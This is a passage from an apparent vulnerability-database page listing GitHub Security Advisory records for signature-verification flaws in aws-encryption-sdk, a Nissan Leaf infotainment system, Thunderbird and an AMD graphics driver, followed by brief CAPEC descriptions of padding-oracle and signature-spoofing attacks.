plaintext from signed data before the signature is validated. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x\n\nUsers processing ESDK messages from untrusted sources should use the new maximum encrypted data keys parameter. See https://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x\n\n### Workarounds\n\nNone\n\n### For more information\n\nhttps://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/concepts.html#digital-sigs\n\nhttps://docs.aws.amazon.com/encryption-sdk/latest/developer-guide/about-versions.html#version2.2.x\n",
"id": "GHSA-x5h4-9gqw-942j",
"modified": "2021-06-01T19:12:22Z",
"published": "2021-06-01T21:17:53Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aws/aws-encryption-sdk-python/security/advisories/GHSA-x5h4-9gqw-942j"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Improper Verification of Cryptographic Signature in aws-encryption-sdk"
}
GHSA-X78V-9635-M8H6
Vulnerability from github – Published: 2026-02-15 12:30 – Updated: 2026-02-15 12:30The system suffers from the absence of a kernel module signature verification. If an attacker can execute commands on behalf of root user (due to additional vulnerabilities), then he/she is also able to load custom kernel modules to the kernel space and execute code in the kernel context. Such a flaw can lead to taking control over the entire system.
First identified on Nissan Leaf ZE1 manufactured in 2020.
{
"affected": [],
"aliases": [
"CVE-2025-32060"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-15T11:15:54Z",
"severity": "MODERATE"
},
"details": "The system suffers from the absence of a kernel module signature verification. If an attacker can execute commands on behalf of root user (due to additional vulnerabilities), then he/she is also able to load custom kernel modules to the kernel space and execute code in the kernel context. Such a flaw can lead to taking control over the entire system.\n\n\n\nFirst identified on Nissan Leaf ZE1 manufactured in 2020.",
"id": "GHSA-x78v-9635-m8h6",
"modified": "2026-02-15T12:30:25Z",
"published": "2026-02-15T12:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32060"
},
{
"type": "WEB",
"url": "https://pcacybersecurity.com/resources/advisory/vulnerabilities-in-nissan-infotainment-manufactured-by-bosch"
},
{
"type": "WEB",
"url": "https://www.nissan.co.uk/vehicles/new-vehicles/leaf.html"
},
{
"type": "WEB",
"url": "http://i.blackhat.com/Asia-25/Asia-25-Evdokimov-Remote-Exploitation-of-Nissan-Leaf.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-X89C-F42W-CH2G
Vulnerability from github – Published: 2022-05-24 19:06 – Updated: 2022-05-24 19:06Thunderbird did not check if the user ID associated with an OpenPGP key has a valid self signature. An attacker may create a crafted version of an OpenPGP key, by either replacing the original user ID, or by adding another user ID. If Thunderbird imports and accepts the crafted key, the Thunderbird user may falsely conclude that the false user ID belongs to the correspondent. This vulnerability affects Thunderbird < 78.9.1.
{
"affected": [],
"aliases": [
"CVE-2021-23992"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-06-24T14:15:00Z",
"severity": "MODERATE"
},
"details": "Thunderbird did not check if the user ID associated with an OpenPGP key has a valid self signature. An attacker may create a crafted version of an OpenPGP key, by either replacing the original user ID, or by adding another user ID. If Thunderbird imports and accepts the crafted key, the Thunderbird user may falsely conclude that the false user ID belongs to the correspondent. This vulnerability affects Thunderbird \u003c 78.9.1.",
"id": "GHSA-x89c-f42w-ch2g",
"modified": "2022-05-24T19:06:12Z",
"published": "2022-05-24T19:06:12Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23992"
},
{
"type": "WEB",
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1666236"
},
{
"type": "WEB",
"url": "https://www.mozilla.org/security/advisories/mfsa2021-13"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-X8XW-JC3C-CX53
Vulnerability from github – Published: 2023-11-14 21:31 – Updated: 2025-02-13 18:32Improper signature verification of RadeonTM RX Vega M Graphics driver for Windows may allow an attacker with admin privileges to launch AMDSoftwareInstaller.exe without validating the file signature potentially leading to arbitrary code execution.
{
"affected": [],
"aliases": [
"CVE-2023-20567"
],
"database_specific": {
"cwe_ids": [
"CWE-347"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-11-14T19:15:15Z",
"severity": "MODERATE"
},
"details": "Improper signature verification of RadeonTM RX Vega M Graphics driver for Windows may allow an attacker with admin privileges to launch AMDSoftwareInstaller.exe without validating the file signature potentially leading to arbitrary code execution.",
"id": "GHSA-x8xw-jc3c-cx53",
"modified": "2025-02-13T18:32:03Z",
"published": "2023-11-14T21:31:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20567"
},
{
"type": "WEB",
"url": "https://www.amd.com/en/corporate/product-security/bulletin/AMD-SB-6003"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00971.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
No mitigation information available for this CWE.
CAPEC-463: Padding Oracle Crypto Attack
An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key.
CAPEC-475: Signature Spoofing by Improper Validation
An adversary exploits a cryptographic weakness in the signature verification algorithm implementation to generate a valid signature without knowing the key.